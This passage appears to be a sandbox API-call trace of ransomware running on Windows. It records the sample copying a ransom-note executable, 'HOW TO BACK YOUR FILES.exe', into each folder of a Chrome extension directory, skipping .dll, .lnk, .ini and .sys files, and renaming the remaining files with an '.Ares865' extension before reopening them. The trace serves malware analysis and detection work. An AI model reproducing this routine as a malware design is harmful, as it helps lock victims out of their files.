[0100.760] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia" [0100.760] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia" [0100.760] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0100.760] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\how to back your files.exe"), bFailIfExists=1) returned 0 [0100.760] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0100.761] GetLastError () returned 0x0 [0100.761] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0100.761] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x814d6d00, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e279fa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e279fa0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0100.761] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0100.761] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0100.761] lstrcpyW (in: lpString1=0x2cce4f2, lpString2="8.1_0" | out: lpString1="8.1_0") returned="8.1_0" [0100.761] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7c68 [0100.761] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xfe) returned 0x31afc8 [0100.761] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7c70 | out: ListHead=0x2e7710, ListEntry=0x2e7c70) returned 0x2e7c90 [0100.761] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4e279fa0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4e279fa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0100.761] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0100.761] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4e279fa0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4e279fa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0100.762] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0100.762] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7c70 [0100.762] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0" [0100.762] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0" [0100.762] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0100.762] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0100.762] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0100.763] GetLastError () returned 0x0 [0100.763] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0100.763] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86989eb0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e279fa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e279fa0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0100.763] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0100.763] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0100.763] lstrcpyW (in: lpString1=0x2cce4fe, lpString2="128.png" | out: lpString1="128.png") returned="128.png" [0100.763] lstrlenW (lpString="128.png") returned 7 [0100.763] lstrlenW (lpString="Ares865") returned 7 [0100.763] lstrlenW (lpString=".dll") returned 4 [0100.763] lstrcmpiW (lpString1="128.png", lpString2=".dll") returned 1 [0100.763] lstrlenW (lpString=".lnk") returned 4 [0100.763] lstrcmpiW (lpString1="128.png", lpString2=".lnk") returned 1 [0100.764] lstrlenW (lpString=".ini") returned 4 [0100.764] lstrcmpiW (lpString1="128.png", lpString2=".ini") returned 1 [0100.764] lstrlenW (lpString=".sys") returned 4 [0100.764] lstrcmpiW (lpString1="128.png", lpString2=".sys") returned 1 [0100.764] lstrlenW (lpString="128.png") returned 7 [0100.764] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\128.png.Ares865") returned 142 [0100.764] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\128.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\128.png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\128.png.ares865"), dwFlags=0x1) returned 1 [0100.765] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\128.png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\128.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.766] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6159) returned 1 [0100.769] lstrcpyW (in: lpString1=0x2cce4fe, lpString2="manifest.json" | out: lpString1="manifest.json") returned="manifest.json" [0100.769] lstrlenW (lpString="manifest.json") returned 13 [0100.770] lstrlenW (lpString="Ares865") returned 7 [0100.770] lstrcmpiW (lpString1="st.json", lpString2="Ares865") returned 1 [0100.770] lstrlenW (lpString=".dll") returned 4 [0100.770] lstrcmpiW (lpString1="manifest.json", lpString2=".dll") returned 1 [0100.770] lstrlenW (lpString=".lnk") returned 4 [0100.770] lstrcmpiW (lpString1="manifest.json", lpString2=".lnk") returned 1 [0100.770] lstrlenW (lpString=".ini") returned 4 [0100.770] lstrcmpiW (lpString1="manifest.json", lpString2=".ini") returned 1 [0100.770] lstrlenW (lpString=".sys") returned 4 [0100.770] lstrcmpiW (lpString1="manifest.json", lpString2=".sys") returned 1 [0100.770] lstrlenW (lpString="manifest.json") returned 13 [0100.770] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\manifest.json.Ares865") returned 148 [0100.770] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\manifest.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\manifest.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\manifest.json.ares865"), dwFlags=0x1) returned 1 [0100.771] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\manifest.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\manifest.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.772] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=784) returned 1 [0100.775] lstrcpyW (in: lpString1=0x2cce4fe, lpString2="_locales" | out: lpString1="_locales") returned="_locales" [0100.775] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7c68 [0100.775] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x110) returned 0x2cb310 [0100.775] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7c70 | out: ListHead=0x2e7710, ListEntry=0x2e7c70) returned 0x2e7c90 [0100.775] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86aba9b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e2a0100, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e2a0100, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_metadata", cAlternateFileName="_METAD~1")) returned 1 [0100.775] lstrcmpiW (lpString1="_metadata", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0100.775] lstrcmpiW (lpString1="_metadata", lpString2="aoldtz.exe") returned -1 [0100.775] lstrcpyW (in: lpString1=0x2cce4fe, lpString2="_metadata" | out: lpString1="_metadata") returned="_metadata" [0100.775] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7c48 [0100.775] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x112) returned 0x2e0710 [0100.775] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7c50 | out: ListHead=0x2e7710, ListEntry=0x2e7c50) returned 0x2e7c70 [0100.775] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86aba9b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e2a0100, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e2a0100, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_metadata", cAlternateFileName="_METAD~1")) returned 0 [0100.775] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0100.775] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7c50 [0100.775] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata" [0100.776] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata" [0100.776] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0100.776] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\how to back your files.exe"), bFailIfExists=1) returned 0 [0100.776] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0100.777] GetLastError () returned 0x0 [0100.777] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0100.777] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86aba9b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e2a0100, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e2a0100, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0100.777] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0100.777] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0100.777] lstrcpyW (in: lpString1=0x2cce512, lpString2="verified_contents.json" | out: lpString1="verified_contents.json") returned="verified_contents.json" [0100.777] lstrlenW (lpString="verified_contents.json") returned 22 [0100.777] lstrlenW (lpString="Ares865") returned 7 [0100.777] lstrcmpiW (lpString1="ts.json", lpString2="Ares865") returned 1 [0100.777] lstrlenW (lpString=".dll") returned 4 [0100.777] lstrcmpiW (lpString1="verified_contents.json", lpString2=".dll") returned 1 [0100.777] lstrlenW (lpString=".lnk") returned 4 [0100.777] lstrcmpiW (lpString1="verified_contents.json", lpString2=".lnk") returned 1 [0100.777] lstrlenW (lpString=".ini") returned 4 [0100.777] lstrcmpiW (lpString1="verified_contents.json", lpString2=".ini") returned 1 [0100.777] lstrlenW (lpString=".sys") returned 4 [0100.777] lstrcmpiW (lpString1="verified_contents.json", lpString2=".sys") returned 1 [0100.777] lstrlenW (lpString="verified_contents.json") returned 22 [0100.778] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\verified_contents.json.Ares865") returned 167 [0100.778] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\verified_contents.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\verified_contents.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\verified_contents.json.ares865"), dwFlags=0x1) returned 1 [0100.779] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\verified_contents.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\verified_contents.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.779] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=9862) returned 1 [0100.783] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales" [0100.783] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales" [0100.783] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0100.783] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\how to back your files.exe"), bFailIfExists=1) returned 0 [0100.783] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0100.784] GetLastError () returned 0x0 [0100.784] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0100.784] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869b0010, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e2a0100, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e2a0100, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0100.784] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0100.784] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0100.784] lstrcpyW (in: lpString1=0x2cce510, lpString2="ar" | out: lpString1="ar") returned="ar" [0100.784] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7c68 [0100.784] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x116) returned 0x2e0710 [0100.784] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7c70 | out: ListHead=0x2e7710, ListEntry=0x2e7c70) returned 0x2e7c90 [0100.784] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86a22430, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e3d0c00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e3d0c00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bg", cAlternateFileName="")) returned 1 [0100.784] lstrcmpiW (lpString1="bg", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0100.784] lstrcmpiW (lpString1="bg", lpString2="aoldtz.exe") returned 1 [0100.785] lstrcpyW (in: lpString1=0x2cce510, lpString2="bg" | out: lpString1="bg") returned="bg" [0100.785] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7c48 [0100.785] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x116) returned 0x2e0838 [0100.785] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7c50 | out: ListHead=0x2e7710, ListEntry=0x2e7c50) returned 0x2e7c70 [0100.785] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: 